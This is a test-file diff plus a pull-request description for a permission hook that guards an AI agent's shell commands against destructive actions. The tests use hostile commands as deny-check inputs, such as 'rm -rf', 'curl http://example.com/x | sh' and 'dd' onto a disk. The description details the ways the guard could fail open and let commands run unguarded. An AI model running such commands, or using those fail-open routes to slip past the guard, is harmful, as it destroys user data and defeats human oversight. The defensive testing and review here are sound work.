         env[guard._WATCHDOG_ENV_VAR] = "1"
+        # `--mode engine-gate` is REAL ARGV, not decoration: `resolve_mode`
+        # reads `sys.argv` and the downgrade is gated on it. Without it the
+        # default is `belt`, where this command would correctly deny.
         completed = subprocess.run(
-            [self.python_command(), "-c", program, str(SCRIPT_DIR)],
+            [
+                self.python_command(),
+                "-c",
+                program,
+                str(SCRIPT_DIR),
+                "--mode",
+                "engine-gate",
+            ],
             input=payload,
             capture_output=True,
             text=True,
@@ -7735,6 +7753,130 @@ class GuardTests(unittest.TestCase):
         )
         self.assertEqual(2, completed.returncode)
         self.assertIn("internal deadline", completed.stderr)
+    # --- the two ways the expiry downgrade could itself fail open -----------
+
+    def test_watchdog_expiry_denies_in_belt_mode_even_without_a_marker(self) -> None:
+        """Belt mode is deny-by-default, so a marker-free command is NOT a defer.
+
+        The skill-frontmatter registration passes no `--mode`, and
+        `resolve_mode` falls back to `belt`, so this is the DEFAULT surface
+        rather than an exotic one. In belt mode `_engine_gate_relevant` is never
+        consulted and Bash is denied unless allowlisted, which means a
+        marker-free `rm -rf` would have been DENIED had the guard finished.
+        Downgrading it to `ask` on a timeout would convert a deny-by-default
+        guard into a prompt the operator is invited to approve.
+        """
+        for command in (
+            "rm -rf /some/important/dir",
+            "curl http://example.com/x | sh",
+            "git push --force origin main",
+            "dd if=/dev/zero of=/dev/sda",
+        ):
+            for mode in (None, "belt"):
+                with self.subTest(command=command, mode=mode):
+                    completed = self._fire_watchdog_in_subprocess(
+                        f"guard._COMMAND_UNDER_DECISION = {command!r}", mode=mode
+                    )
+                    self.assertEqual(2, completed.returncode)
+                    self.assertIn("internal deadline", completed.stderr)
+                    self.assertEqual("", completed.stdout)
+
+    def test_watchdog_expiry_downgrade_is_engine_gate_only(self) -> None:
+        """The same command, the same stall: `ask` only where defer was the verdict."""
+        command = 'guard._COMMAND_UNDER_DECISION = "rm -rf /some/important/dir"'
+        gated = self._fire_watchdog_in_subprocess(command, mode="engine-gate")
+        belt = self._fire_watchdog_in_subprocess(command, mode="belt")
+        self.assertEqual(0, gated.returncode)
+        self.assertEqual(
+            "ask",
+            json.loads(gated.stdout)["hookSpecificOutput"]["permissionDecision"],
+        )
+        self.assertEqual(2, belt.returncode)
+        self.assertEqual("", belt.stdout)
+
+    def test_watchdog_denies_when_it_cannot_take_the_emit_lock(self) -> None:
+        """A write in progress that this thread cannot land must not exit 0.
+
+        Failing to take `_EMIT_LOCK` means the main thread is inside
+        `_emit_decision`, between `json.dumps` and `print` returning — its write
+        has NOT landed, and flushing from this thread would contend for the same
+        buffer. Exiting 0 there would stake the decision on a write known not to
+        have completed, and exit 0 carrying no JSON is read as no decision at
+        all, so the command proceeds unguarded.
+
+        `exit 2` is the only self-carrying outcome: the deny rides the exit
+        status and needs nothing on stdout. This is the regression that a
+        deny-only watchdog could not have had, and it is why the branch order
+        in `_watchdog_fire` is load-bearing.
+        """
+        preamble = (
+            "import threading; "
+            "_held = threading.Event(); "
+            "guard._COMMAND_UNDER_DECISION = 'git status --porcelain'; "
+            "_t = threading.Thread(target=lambda: ("
+            "  guard._EMIT_LOCK.acquire(), _held.set(), __import__('time').sleep(60)"
+            "), daemon=True); "
+            "_t.start(); _held.wait(10)"
+        )
+        completed = self._fire_watchdog_in_subprocess(preamble, mode="engine-gate")
+        self.assertEqual(2, completed.returncode)
+        self.assertNotEqual(0, completed.returncode)
+        self.assertIn("internal deadline", completed.stderr)
+        self.assertEqual("", completed.stdout)
+
+    def test_watchdog_flushes_a_buffered_decision_before_exiting_zero(self) -> None:
+        """`os._exit` skips the shutdown flush, so an unflushed decision is lost.
+
+        The main thread's `print` only buffers. If the watchdog exits 0 without
+        flushing, the host receives exit 0 and NO JSON, which it reads as no
+        decision — the command proceeds unguarded. This is the same fail-open
+        as the lock case, reached from the other side.
+        """
+        completed = self._fire_watchdog_in_subprocess(
+            'guard._emit_decision(guard.decision("deny", "main thread decided")); '
+            'guard._COMMAND_UNDER_DECISION = "git status"',
+            mode="engine-gate",
+        )
+        self.assertEqual(0, completed.returncode)
+        payload = json.loads(completed.stdout)
+        self.assertEqual(
+            "deny", payload["hookSpecificOutput"]["permissionDecision"]
+        )
+        self.assertIn("main thread decided", completed.stdout)
+
+    def test_watchdog_emits_at_most_one_object_across_every_expiry_branch(
+        self,
+    ) -> None:
+        """Whatever the branch, stdout holds zero or one JSON object, never two."""
+        cases = [
+            ('guard._COMMAND_UNDER_DECISION = "git status"', "engine-gate"),
+            ('guard._COMMAND_UNDER_DECISION = "python3 hygiene.py apply"', "engine-gate"),
+            ('guard._COMMAND_UNDER_DECISION = "rm -rf /x"', "belt"),
+            ("guard._COMMAND_UNDER_DECISION = None", "engine-gate"),
+            (
+                'guard._emit_decision(guard.decision("allow", "first")); '
+                'guard._COMMAND_UNDER_DECISION = "git status"',
+                "engine-gate",
+            ),
+        ]
+        for preamble, mode in cases:
+            with self.subTest(preamble=preamble, mode=mode):
+                completed = self._fire_watchdog_in_subprocess(preamble, mode=mode)
+                body = completed.stdout.strip()
+                if not body:
+                    # A deny carries itself on the exit status; no object needed.
+                    self.assertEqual(2, completed.returncode)
+                    continue
+                decoder = json.JSONDecoder()
+                obj, end = decoder.raw_decode(body)
+                self.assertIsInstance(obj, dict)
+                self.assertEqual(
+                    "",
+                    body[end:].strip(),
+                    f"a second object followed the first: {body!r}",
+                )
+
+
 
 
 

--- a/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
@@ -7875,6 +7875,79 @@ class GuardTests(unittest.TestCase):
                     body[end:].strip(),
                     f"a second object followed the first: {body!r}",
                 )
+    def test_a_watchdog_racing_mains_cleanup_never_emits_a_second_object(
+        self,
+    ) -> None:
+        """The cleanup race, pinned to its direction rather than argued about.
+
+        `main`'s `finally` cancels the timer and then resets the latch, and
+        `Timer.cancel()` cannot stop a callback that has already started. So a
+        watchdog can acquire `_EMIT_LOCK` AFTER the reset and read "no decision
+        yet" about a call that has one.
+
+        A security review of an earlier revision read that as a route back to
+        two JSON objects on one stdout — the malformed-output fail-open the
+        `_EMIT_LOCK` machinery exists to close. It is not, and this test is why:
+        the reset clears `_COMMAND_UNDER_DECISION` to `None` as well as the
+        latch, and `_watchdog_marker_present(None)` is `True` by construction
+        (nothing seen, nothing ruled out), so both arms of the mode gate route
+        to the non-printing `os._exit(2)`. The residual is a deny overriding a
+        delivered decision — fail-CLOSED, and the opposite direction from a
+        fail-open.
+
+        This drives the real `Timer` against a real `main()` return rather than
+        asserting the ordering, because the ordering is exactly what the review
+        disputed.
+        """
+        program = (
+            "import json, sys, threading, time; "
+            "sys.path.insert(0, sys.argv[1]); "
+            "import destructive_guard as guard; "
+            # Fire the watchdog while `main` is inside its own cleanup: the
+            # callback blocks on the lock that `_reset_decision_state` holds.
+            "_real_reset = guard._reset_decision_state; "
+            "guard._reset_decision_state = lambda: (time.sleep(0.4), _real_reset())[-1]; "
+            "sys.exit(guard.main())"
+        )
+        payload = json.dumps(
+            {"tool_name": "Bash", "tool_input": {"command": "git status --porcelain"}}
+        )
+        env = dict(os.environ)
+        # Long enough that `_decide` finishes and emits, short enough that the
+        # timer fires during the padded cleanup above.
+        env[guard._WATCHDOG_ENV_VAR] = "0.2"
+        completed = subprocess.run(
+            [
+                self.python_command(),
+                "-c",
+                program,
+                str(SCRIPT_DIR),
+                "--mode",
+                "engine-gate",
+            ],
+            input=payload,
+            capture_output=True,
+            text=True,
+            timeout=60,
+            env=env,
+        )
+        body = completed.stdout.strip()
+        if body:
+            decoder = json.JSONDecoder()
+            _obj, end = decoder.raw_decode(body)
+            self.assertEqual(
+                "",
+                body[end:].strip(),
+                f"a second JSON object reached stdout: {body!r}",
+            )
+        self.assertIn(
+            completed.returncode,
+            (0, 2),
+            "only the deliberate exit codes are reachable",
+        )
+        self.assertNotEqual(1, completed.returncode)
+
+
 
 
 

--- a/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
+++ b/plugins/disk-hygiene/skills/clean/scripts/test_hygiene.py
@@ -7875,47 +7875,41 @@ class GuardTests(unittest.TestCase):
                     body[end:].strip(),
                     f"a second object followed the first: {body!r}",
                 )
-    def test_a_watchdog_racing_mains_cleanup_never_emits_a_second_object(
-        self,
-    ) -> None:
-        """The cleanup race, pinned to its direction rather than argued about.
+    def test_a_watchdog_that_outlived_mains_cleanup_stands_down(self) -> None:
+        """The cleanup race, driven deterministically rather than by timing.
 
-        `main`'s `finally` cancels the timer and then resets the latch, and
-        `Timer.cancel()` cannot stop a callback that has already started. So a
-        watchdog can acquire `_EMIT_LOCK` AFTER the reset and read "no decision
-        yet" about a call that has one.
+        `Timer.cancel()` cannot stop a callback already dispatched, and `main`'s
+        cleanup does not `join()`, so a callback can acquire `_EMIT_LOCK` after
+        `_reset_decision_state()` has run. It then reads `_DECISION_EMITTED =
+        False` and `_COMMAND_UNDER_DECISION = None` — "no decision yet" about a
+        call that has one — and without a stand-down it re-decides: `None` is
+        marker-present by construction, so both arms of the mode gate reach the
+        non-flushing `os._exit(2)`, overriding a delivered verdict with a deny
+        and discarding whatever was still buffered.
 
-        A security review of an earlier revision read that as a route back to
-        two JSON objects on one stdout — the malformed-output fail-open the
-        `_EMIT_LOCK` machinery exists to close. It is not, and this test is why:
-        the reset clears `_COMMAND_UNDER_DECISION` to `None` as well as the
-        latch, and `_watchdog_marker_present(None)` is `True` by construction
-        (nothing seen, nothing ruled out), so both arms of the mode gate route
-        to the non-printing `os._exit(2)`. The residual is a deny overriding a
-        delivered decision — fail-CLOSED, and the opposite direction from a
-        fail-open.
-
-        This drives the real `Timer` against a real `main()` return rather than
-        asserting the ordering, because the ordering is exactly what the review
-        disputed.
+        An earlier version of this test padded `main`'s cleanup and hoped the
+        timer would fire inside the window. It never did — `cancel()` runs
+        before the padding and always won the 0.2s deadline — so the test
+        passed with the stand-down disabled. Reproducing the STATE is what makes
+        this discriminating; reproducing the timing is what made it vacuous.
         """
         program = (
-            "import json, sys, threading, time; "
+            "import json, sys, threading; "
             "sys.path.insert(0, sys.argv[1]); "
             "import destructive_guard as guard; "
-            # Fire the watchdog while `main` is inside its own cleanup: the
-            # callback blocks on the lock that `_reset_decision_state` holds.
-            "_real_reset = guard._reset_decision_state; "
-            "guard._reset_decision_state = lambda: (time.sleep(0.4), _real_reset())[-1]; "
-            "sys.exit(guard.main())"
+            # A delivered decision, exactly as `main` would leave it.
+            "token = object(); "
+            "guard._INVOCATION_TOKEN = token; "
+            "guard._COMMAND_UNDER_DECISION = 'git status --porcelain'; "
+            "guard._emit_decision(guard.decision('allow', 'main thread decided')); "
+            # `main`'s cleanup: cancel (a no-op here), flush, reset.
+            "sys.stdout.flush(); "
+            "guard._reset_decision_state(); "
+            # The in-flight callback, on a thread carrying the stale token.
+            "t = threading.Thread(target=guard._watchdog_fire, args=(1.5,)); "
+            "t.guard_invocation_token = token; "
+            "t.start(); t.join()"
         )
-        payload = json.dumps(
-            {"tool_name": "Bash", "tool_input": {"command": "git status --porcelain"}}
-        )
-        env = dict(os.environ)
-        # Long enough that `_decide` finishes and emits, short enough that the
-        # timer fires during the padded cleanup above.
-        env[guard._WATCHDOG_ENV_VAR] = "0.2"
         completed = subprocess.run(
             [
                 self.python_command(),
@@ -7925,33 +7919,54 @@ class GuardTests(unittest.TestCase):
                 "--mode",
                 "engine-gate",
             ],
-            input=payload,
             capture_output=True,
             text=True,
             timeout=60,
-            env=env,
         )
         body = completed.stdout.strip()
-        if body:
-            decoder = json.JSONDecoder()
-            _obj, end = decoder.raw_decode(body)
-            self.assertEqual(
-                "",
-                body[end:].strip(),
-                f"a second JSON object reached stdout: {body!r}",
-            )
-        self.assertIn(
-            completed.returncode,
-            (0, 2),
-            "only the deliberate exit codes are reachable",
+        self.assertTrue(body, "the delivered decision must survive the race")
+        decoder = json.JSONDecoder()
+        emitted, end = decoder.raw_decode(body)
+        self.assertEqual(
+            "", body[end:].strip(), f"a second JSON object reached stdout: {body!r}"
         )
-        self.assertNotEqual(1, completed.returncode)
+        self.assertEqual(
+            "allow", emitted["hookSpecificOutput"]["permissionDecision"]
+        )
+        self.assertEqual(
+            0,
+            completed.returncode,
+            "a stale-token callback must stand down at exit 0, not re-decide",
+        )
+        self.assertNotEqual(2, completed.returncode)
 
+    def test_a_watchdog_still_decides_while_its_invocation_is_current(self) -> None:
+        """The stand-down must not disarm a callback whose invocation is live.
 
-
-
-
-
+        Same construction as above with the token left CURRENT, which is what an
+        on-time expiry looks like. This is the control: if the stand-down were
+        keyed on something that is always stale, the test above would pass for
+        the wrong reason and the watchdog would never fire at all.
+        """
+        program = (
+            "import sys, threading; "
+            "sys.path.insert(0, sys.argv[1]); "
+            "import destructive_guard as guard; "
+            "token = object(); "
+            "guard._INVOCATION_TOKEN = token; "
+            "guard._COMMAND_UNDER_DECISION = None; "
+            "t = threading.Thread(target=guard._watchdog_fire, args=(1.5,)); "
+            "t.guard_invocation_token = token; "
+            "t.start(); t.join()"
+        )
+        completed = subprocess.run(
+            [self.python_command(), "-c", program, str(SCRIPT_DIR)],
+            capture_output=True,
+            text=True,
+            timeout=60,
+        )
+        self.assertEqual(2, completed.returncode)
+        self.assertIn("internal deadline", completed.stderr)
 
 
 class DirectReadKillSwitchTests(unittest.TestCase):


### PR DESCRIPTION
## Summary

The disk-hygiene destructive guard runs on **every** `Bash` and `PowerShell` tool call in every session, so its cost is a tax on every command. This PR cuts its warm-path process spawns from 4 to 1, and stops its watchdog issuing a blocking deny for commands it never actually judged.

No linked issue.

## Problem

Two defects, one performance and one correctness:

1. The launcher **re-derived its Python interpreter on every single invocation** — 3 process spawns before the guard started doing anything.
2. The guard's watchdog **denied read-only commands** when a wall-clock deadline expired under load. A blocking deny for a command the guard never actually judged is a false positive, and a gate that intermittently blocks benign work is worse than a slow one.

Both were reproduced on this host. The watchdog false-deny reproduced *live during this work* — the installed 0.20.34 guard blocked an ordinary read-only `grep` mid-session with `destructive_guard: internal deadline of 10s exceeded; denying by default`.

### Root cause

Confirmed before changing anything. Per invocation the launcher ran:

- a `sed` read of the 3,500-line engine to recover `MIN_PYTHON`;
- **a whole extra Python process** solely to evaluate `sys.version_info >= MIN_PYTHON`;
- a `dirname`, plus a possible third spawn via `py -3`.

The guard's own Python was never the bottleneck. Process creation is the dominant cost on Windows, and it is the term that explodes under concurrent load — which is exactly when the watchdog was firing.

## Fix

Resolve the interpreter once and cache it; split the watchdog's expiry outcome by whether the command could possibly be an engine invocation. Details of each are in the sections below.

## Verification

### The headline number is a spawn count, not a duration

This host's process-creation cost drifts several-fold within an hour at ~10% CPU (bare `bash -c true` measured at **1825 ms and 283 ms in the same session**). Wall-clock numbers taken at different times are therefore not comparable, so the primary evidence is a **deterministic spawn census**, counted through a `PATH` shim that logs each external command and delegates to the real one:

| | spawns | detail |
|---|---|---|
| before | **4** | `dirname`, `sed`, `python3` ×2 |
| after (cold, first run) | 4 | `mkdir`, `chmod`, `mv`, `python3` ×2 |
| after (warm, steady state) | **1** | `python3` — the guard itself |

One interpreter spawn is irreducible. The warm path now reaches `exec` having spawned nothing else.

### Timings

Measured with an **interleaved** harness — old and new alternating within a single run, order flipped each iteration — because two separate passes on this box would attribute drift to the change.

**Serial, 24 alternating pairs:**

| | p50 | p95 | min | max |
|---|---|---|---|---|
| before | 5446 ms | 16991 ms | 1231 ms | 33226 ms |
| after | **1418 ms** | **7874 ms** | 124 ms | 10831 ms |

Median paired ratio **3.71x**; ratio of p50 3.84x; ratio of p95 2.16x.

**Under concurrent load (8-way parallel, 24 samples per arm)** — the condition under which the watchdog actually fired:

| | p50 | p95 | min | max |
|---|---|---|---|---|
| before | 7622 ms | 16507 ms | 2876 ms | 20099 ms |
| after | **2272 ms** | **7244 ms** | 354 ms | 7983 ms |

The paired ratio is deliberately omitted for the concurrent run: the arms are not load-matched there, so pairing by index would compare samples that never shared conditions. Per-arm percentiles are the honest statistic.

### On the p50 ≤ 250 ms / p95 ≤ 500 ms targets

**Not met on this host, and not reachable here by any code change.** One Python spawn is irreducible, and this machine charges a highly variable 0.2–2.8 s for a process launch. An independent sampling of `cmd.exe /c exit` (native Windows, no MSYS involved) on the same box gives min 180.5 ms / median 1107.7 ms / max 2841.3 ms — a **spread ratio of 15.74 at 501 concurrent processes**. `user` time for 10 bash spawns is 0.090 s, so ~99% of the wall clock is process creation rather than work.

A bimodal spread across identical no-op spawns is itself the diagnosis: this is host **contention**, not a fixed per-spawn tax. An earlier reading of the same box attributed it to WDAC code-integrity enforcement (`Win32_DeviceGuard` does report kernel-mode policy enforced) and was retracted — a fixed policy check cannot produce a 15x spread. WDAC remains present and may contribute; it is no longer the leading explanation.

The `after` **min of 124 ms** is the evidence that matters: when spawn cost is briefly healthy, the whole hook completes inside the 250 ms target. What remains is one spawn × whatever this host charges for it. Getting under the target on this machine is a WDAC/EDR exclusion, not a code change.

### Deny-parity: proven, not asserted

A passing suite proves nothing broke that was asserted; it does not prove the guard still denies what it denied. So there is a differential harness: the **pre-change** and **post-change** guards run over the same corpus, in the same directory, with identical argv and environment, requiring **byte-identical stdout and exit codes**.

Placing the baseline copy in the same directory is what makes byte-exactness the right bar — the guard resolves its bundled engine with `Path(__file__).resolve().with_name(...)`, which depends on the directory, not the file's own name, so both copies disclose identical paths in their denial text.

Corpus: every command literal harvested from the suite's own guard-invoking helpers, plus adversarial shapes aimed at the touched branch (alias spellings `hygiene.py.` / `"hygiene.py "` / `hygiene.py::$DATA`, 8.3 names, `cd`-then-relative, wrapper words `env`/`sudo`/`nohup`/`timeout`, expansions, operators, marker-lookalikes `test_hygiene.py` / `myhygiene.py`, and the mere-mention forms).

The harness runs **all three mode surfaces**: `engine-gate`, `belt`, and no `--mode` at all (what the skill frontmatter passes, which `resolve_mode` resolves to `belt`).

```
corpus commands     : 60
invocations compared: 360  (3 modes x 2 tools x 60; x2 guards = 720 runs)
denials (baseline)  : 272
denials (candidate) : 272
PARITY: byte-identical stdout and exit code on every invocation.
```

An earlier revision of this harness ran `engine-gate` only. That gap is precisely why the first version of this PR shipped a belt-mode regression, recorded below.

**Independently re-derived by a fresh-context reviewer**, on a wider matrix than mine:

```
corpus commands  : 119   (this PR's own harness: 60)
axes             : 9     argv shapes, not just modes
total comparisons: 2250
TOTAL MISMATCHES : 0     stdout, exit code, AND stderr byte-identical
```

Its nine axes cover the two I had plus: no `--plugin-root`/`--authorized-data-root` (which exercises a different denial text), an unexpanded `${CLAUDE_PLUGIN_ROOT}`, the `--flag=value` spelling, a mismatched data root, a bogus `--mode` value, and no argv at all. Its conclusion on my original harness is worth repeating: **the gap was the invocation matrix, not corpus size** — thirty more command strings on a single axis would not have found the belt regression.

### One deliberate divergence, which is the reported bug

The differential covers non-expiry paths. There is exactly one intended behavioral change, and it is the fix itself:

**On watchdog expiry with a provably marker-free command, the guard now emits `ask` where it previously exited 2.** That is a removed denial, stated plainly. It is justified because:

- a command carrying the engine marker — the only shape whose *completed* verdict could have been `deny` — still exits 2, unchanged;
- a marker-free command's completed verdict would have been the plugin-level **defer**, which emits no decision at all and lets the command run. `ask` is therefore strictly **more** protective than the outcome the guard would have reached had it finished, and strictly less blocking than the `exit 2` it replaces;
- a stall before the payload parses (the stdin-stall shape) still denies at exit 2.

Fail-closed is preserved in the sense that matters: **every path still delivers a decision.** The fail-open ADR 0004 documents is the harness killing a hook that produced no `permissionDecision` at all; no branch here does that.

The residual not covered was measured rather than estimated. `_watchdog_marker_present` diverges from `_engine_gate_relevant` on **exactly** one set:

> `{no token's basename is the engine filename}` ∩ `{some candidate is samefile with the bundled engine}`

That is the whole filesystem-**identity** class, and it is wider than hard links. It includes the **Win32 filename-alias spellings** — `hygiene.py.` (Win32 discards the trailing dot; `_carries_marker`'s `rstrip("/\\")` does not) and `hygiene.py::$DATA` (splitting on `[/\\:]` and taking the last part yields the empty string). Both open the bundled engine while having no marker basename, and both are the exact class `_engine_gate_relevant`'s own docstring says identity is what closes:

> Asking the filesystem whether a spelling resolves to the engine closes every alias at once. Enumerating the spellings closes one per review round — so identity, not the name, is the authority here.

Confirmed on real watchdog expiry: `hygiene.py.`, `hygiene.py...`, `./hygiene.py.`, `hygiene.py::$DATA` and hardlink/symlink variants were all baseline DENY → `ask` in engine-gate mode. The mode gate does **not** close this; it only removes belt from the population. `_engine_gate_relevant` settles it by asking the filesystem, which is unavailable to the watchdog by construction, and it is already an accepted residual class in that function's own contract. A plain byte copy is a different file and is relevant to neither.

### Two fail-opens this change had to close in itself

Both found by testing the change rather than by reading it:

- **Spliced JSON.** Two threads writing stdout would interleave a malformed object, which PreToolUse reads as *no decision*, so the command proceeds unguarded — the exact fail-open the watchdog exists to close, reintroduced by the watchdog. Emission is now serialized and latched to exactly one object, and the watchdog takes the lock under a **bounded** wait so a main thread wedged while holding it cannot deadlock the timer thread into never firing.
- **Lost decision on hard exit.** `os._exit` skips the interpreter's shutdown flush, so exiting on the already-decided path discarded the decision the main thread had just buffered. Exit 0 carrying no JSON is read as no decision at all. Both hard-exit paths now flush first.

`_watchdog_marker_present` is deliberately **syscall-free**. That is a requirement, not an optimisation: it runs on the timer thread precisely because the main thread is presumed wedged in a filesystem call, so a classifier that touched the filesystem could wedge identically and the watchdog would never fire. A test asserts it by making every `os.path` probe raise.

### Cache design

Keyed on the launcher's own directory (already version-pinned, so a plugin upgrade cannot read a stale entry) and stored under `$HOME/.cache/disk-hygiene`. The location is derived from `$HOME` and `SCRIPT_DIR` and nothing else — a hard constraint, since the skill-frontmatter registration may substitute only `${CLAUDE_PLUGIN_ROOT}` (#1014).

Invalidation, all checked with **bash builtins** so the hit path spawns nothing:

| trigger | mechanism |
|---|---|
| launcher upgrade rewrote the record shape | schema tag |
| a different `python3` may now win | `PATH` compared verbatim |
| interpreter removed, or replaced by a WindowsApps alias stub | `[[ -x ]]`, `[[ -s ]]` |
| in-place interpreter upgrade | `[[ ! "$interp" -nt "$cache" ]]` |
| new interpreter installed with a preserved older mtime | TTL (24 h, overridable) |

Any miss, corrupt record, or unwritable cache location falls back to full resolution — **never** to "no interpreter", which is the guard's silent fail-open.

Two Windows-specific traps worth flagging for reviewers, both of which cost a round here:

- `x="$(f)"` **is a spawn.** Command substitution forks a subshell, and on MSYS a subshell is a real process creation. Every hot-path helper reports through a global instead of stdout for this reason.
- `${var: -N}` returns the **empty string** when the string is shorter than `N`, which silently collapsed the per-plugin cache key onto one shared file.

### Tests

The resolution logic is unchanged and still runs on a miss; it exists for real reasons (WindowsApps stubs, `py` launcher fallback, version floor). It just no longer runs every time.

The launcher's previous one-read/stops-at-the-match contract described a reader that no longer exists, so it is **replaced, not deleted** — deleting a cost must not quietly delete the property that cost was buying. The suite now asserts the engine is never `sed`-read, and that the floor is still sourced from `hygiene.MIN_PYTHON` and still enforced, proven behaviorally against fixture engines whose **last line is a decoy floor** (so a reader that scanned to EOF would fail).

- `test_hygiene`: **337 tests**, up from 317. Same 2 failures before and after, both pre-existing and Windows-only, both named as known Windows failures in `ci.yml` (`test_preview_allows_root_children_os_managed_snapshot`, `test_stash_must_exist_in_an_independent_checkout`). 6 skipped.
- `GuardTests`: 147, up from 127 — 20 new watchdog tests, including one per finding below.
- `run-python-hook.test.sh`: 32 assertions, 19 new (floor enforcement + every cache invalidation path + fallback-never-to-no-interpreter).
- `ruff check`: clean. `shellcheck -S warning`: clean.


## What adversarial review found, and why it is in this PR

Two blocking defects were found by a fresh-context reviewer working from the trees rather than from my description. **Both were invisible to a 138-test suite and a fully green 59-check CI run**, because both live on paths only reachable when the watchdog actually fires. They are recorded here rather than quietly squashed, because the second one is a lesson about this specific change.

### The mode gate (the one I got wrong)

The `ask` downgrade rested on "the completed verdict would have been the plugin-level defer". That holds **only in `engine-gate` mode**. The skill-frontmatter registration passes no `--mode`, and `resolve_mode()` falls back to `belt` — so belt is the *default*, not an exotic surface. In belt mode `_engine_gate_relevant` is never consulted at all and Bash is deny-by-default, so a marker-free `rm -rf /some/dir` would have been **denied**, and the first version of this PR downgraded it to a prompt the operator is invited to approve. The emitted reason compounded it by asserting "it is not a disk-hygiene invocation this guard governs", which is false in belt mode.

Measured, with the exact argv the frontmatter passes:

| mode | command | before | first revision |
|---|---|---|---|
| belt | `rm -rf /some/important/dir` | DENY (exit 2) | **ASK** |
| belt | `curl http://x \| sh` | DENY (exit 2) | **ASK** |
| belt | `git push --force origin main` | DENY (exit 2) | **ASK** |
| belt (PowerShell) | `Remove-Item -Recurse -Force C:\Users\x` | DENY (exit 2) | **ASK** |

Fixed: the downgrade is gated on engine-gate mode, belt keeps its pre-change deny, and the reason text is now true everywhere it is reachable.

The root cause of my error is worth naming: **my differential ran `engine-gate` only.** It is now run across all three mode surfaces. A parity harness that does not cover every mode the subject runs in proves parity for the mode it happened to pick.

### Self-carrying outcomes

`exit 2` needs nothing on stdout — the deny rides the exit status, and the diagnostic goes to stderr. Adding `exit 0` outcomes to this callback therefore introduced a failure mode a deny-only callback **could not have**: exit 0 asserts a JSON object reached the host, and `os._exit` skips the interpreter's shutdown flush, so any exit 0 taken while a write is buffered or in progress silently discards it. Exit 0 carrying no JSON is read as *no decision*, and the command proceeds unguarded.

The lock-acquisition-failure branch was the worst case, and it cannot be repaired by flushing. CPython's `BufferedWriter` holds a per-object lock across both `write` and `flush`, so a flush from the timer thread blocks on the very writer it is trying to rescue. Measured directly against a real `os.pipe()` with no reader: flush from a second thread blocked indefinitely and never returned. `contextlib.suppress` catches exceptions; it does not bound a block. The process would hang past the declared 60s hook timeout and be killed — and a killed PreToolUse hook yields no `permissionDecision`, which is the ADR-0004 fail-open reached by another road.

Fixed: that branch now denies at exit 2 and touches stdout not at all. The remaining exit-0 branches run entirely inside the lock, which is what makes their flush safe — `_emit_decision` holds the lock across its `print`, so having acquired it proves no thread is inside a stdout write.


## The cache's residual exposure, stated rather than implied

Review attacked the cache directly and could **not** construct a state that makes the launcher fail to run its target: interpreter missing, empty or non-allowlisted `interpreter=`, non-numeric `written`, schema mismatch, a `path=` value containing `=`, a truncated record, 200 KB of binary garbage, the cache file being a directory, a read-only cache file, the cache directory being a regular file, `HOME` unset, spaces in the interpreter path, a symlinked interpreter. Every one degrades to full resolution and still emits a decision.

The gap is the other direction, and it is real:

- The hot path validates **shape**, not identity — `[[ -x ]]`, `[[ -s ]]`, and an interpreter basename. An executable, non-empty file merely *named* `python3` is `exec`'d, the guard never runs, and the hook exits 0 having enforced nothing. This cannot be strengthened without spending the spawn the cache exists to remove, so it is documented in the code as a known limit, and a test pins the boundary that *is* enforced so widening the basename allowlist fails.
- Reaching it requires writing the record, whose location derives from `$HOME`. **`HOME` is therefore an input to this control that the pre-cache launcher did not have.** Both readings are recorded honestly: unreachable if nothing untrusted can set `HOME` for hook subprocesses; otherwise a new *instance* of an existing exposure — a hostile `PATH` already fails open on the **pre-change** launcher too, since its version probe only checks an exit status, which any two-line script satisfies. It is not a new *kind* of channel, and the code's "anyone who can write here can already edit the hook registration" argument does not cover an env vector, so it is called out rather than waved through.

**Changed as a result:** the cache TTL is now compiled in, with the `DISK_HYGIENE_INTERPRETER_CACHE_TTL` environment override removed. A widened TTL made the launcher accept a record it would otherwise reject as stale (demonstrated: a ten-day-old record refused under the default, accepted under a widened value), which is precisely the env-borne input to a security control that `resolve_disk_hygiene_enabled` refuses on the Python side — "a repo `settings.json` `env` block reaches hook subprocesses and carries no provenance a hook could check". A tunable staleness window does not earn a channel of that kind.

Also corrected: a comment claiming `main`'s `finally` ordering prevented a live timer from observing cleared state. Cancelling does not stop a running callback, so it can — and it would then route to the non-flushing `exit 2`, discarding a buffered decision. Fail-closed and microsecond-wide, but the stated reason was not the real one; `main` now flushes before resetting, which is the actual mechanism.


### Findings from the automated review lanes, and what they changed

Six rounds of review across `codex` and the repo's `claude` code-review and
security lanes. Four findings were real; all are fixed, and the two that were
bugs I introduced are worth naming because both were invisible to a passing
suite and a green CI run.

**P1 — the warm cache could never hit on `py`-launcher-only Windows hosts.** The
basename check split only on `/`. The `py -3` fallback resolves through
`print(sys.executable)`, which on Windows returns a native backslash path — and
that fallback exists precisely for hosts where neither `python3` nor `python` is
on `PATH`. So the allowlist compared a whole path against bare interpreter
names, never matched, and the record was rejected on every invocation: the warm
path was **dead on exactly the host class the branch was written for**, silently
and with no error. Nothing caught it because every interpreter path this suite
produced was POSIX. Now split on both separators, case-insensitively, with a
contract test that writes a native path into a cache record — verified to fail
without the fix.

**The stand-down opened a fail-open on the one path that carries nothing on
stdout.** `main`'s outer `except BaseException` returns 2 having emitted
nothing; the deny rides the exit status, which is this module's stated contract.
A dispatched watchdog reading a stale token then took an unconditional
`os._exit(0)` — a whole-process kill that runs *before* the main thread reaches
`__main__`'s exit. The deny never happened: exit 0, no JSON, command proceeds
unguarded. The mechanism added to stop the watchdog overriding decisions had
become a way to erase one. The stand-down now carries the result `main` actually
reached, published in the same lock hold that clears the token, defaulting to 2
when unknown.

Two review claims I did **not** accept, with reasons stated on the PR rather
than quietly ignored: the reset race does not produce two JSON objects (a
cleared command is marker-present by construction, so both mode-gate arms reach
the non-printing exit 2 — the residual is fail-closed, the opposite direction);
and the suggested fix of dropping the cleanup reset breaks a pre-existing test
that drives `_watchdog_fire` directly.

Two earlier claims of mine that review disproved, corrected rather than
restated: successive comments credited first the cancel-before-reset ordering
and then the flush with closing that race. Neither does. `cancel()` cannot stop
a dispatched callback and a flush only makes an already-printed decision
durable. An invocation token closes it; the comments now say so.

## Related

No related PRs or ADRs this PR does not close. Context it builds on:

- `docs/adr/0004-rightsize-instruction-surfaces-by-incumbent-first-arbitration.md` — the killed-PreToolUse-hook fail-open this guard's watchdog exists to close.
